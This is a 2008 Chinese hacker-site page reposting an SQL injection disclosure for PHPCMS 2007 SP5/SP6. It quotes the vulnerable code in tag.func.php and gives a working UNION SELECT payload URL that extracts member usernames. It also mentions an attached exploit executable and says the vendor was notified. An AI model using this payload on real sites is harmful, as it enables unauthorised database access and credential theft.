首 页文章中心黑客工具黑吧学院技术论坛安全培训免费频道最近更新瑞星在线杀毒黑吧百度繁體中文
  设为首页
加入收藏
发布作品
   
栏目导航
· 漏洞利用 · 脚本注入
· 入侵实例 · 编程代码
· 逆向工程
热门文章
· 如何封别人QQ
· 充QQ币的疯狂——宽...
· 免费得QB
· 400秒远程攻破你的Q...
· [图文] QQ免费建400个群
· [组图] 给你一台永远不关机...
· [注意] QQ宠物砸蛋秘诀
· 再次有机会免费获得...
· 想的挂QQvip的进
· 在QQ中将自己从对方...
相关文章
· PHPCMS2007 SP6 vot...
· phpcms2008注射0day...
· Phpcms 2007 远程文...
· Phpcms 2007 远程文...
· Phpcms 2.4版本中远...
· phpcms 3.0.0文件上...
· phpcms 3.0.0文件上...
· phpCMS 1.2.x任意文...
phpcms injection 三八贺岁 0day
作者:sniperhg  来源:http://www.huaidan.org/  发布时间:2008-3-9 9:38:51  发布人:黑客动画吧

减小字体 增大字体

影响版本:2007SP5 SP6
漏洞文件:/formguide/include/tag.func.php
Author:backerhack 小蟑螂
信息来源:零客网安 www.0kee.com
祝全国女性同胞们节日快乐,关注女性健康… “她好,我也好”
------------灰常淫荡的分割线-------------------------------------------------------
 {
 global $db,$MOD,$MODULE;
 $formid = (!isset($formid)||$formid=='') ? 0 : $formid;
 $query = "SELECT * FROM ".TABLE_FORMGUIDE." WHERE formid=$formid limit 1";
 $r = $db->get_one($query);
 if(!$r)
 {
 echo $LANG['not_exist_form'];
 return '';
 }

变量formid未赋值且过滤不严带入查询导致注入。
测试:http://phpcmsroot/formguide/index.php?formid=1/**/and/**/1=2/**/union/**/select/**/1,username,3,4,5,6,7/**/from/**/phpcms_member/**/where/**/userid=1/*
附上sniperhg写的利用工具… 写的真的很强大,赞一个!
phpcms0dayEXP.exe MD5值:cae31a3ef566ed06068473d787d76359
本文发表前已通知官方。

injection.rar
[ ] [返回上一页] [打 印] [收 藏]
 
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 网站导航 - 作品发布
互联网备案登记:粤ICP备05008775号
友情提示:浏览本站,请使用IE6.0浏览,并将分辩率设置为1024*768 为佳
Copyright © 2002-2005 Hack58.Com. All Rights Reserved .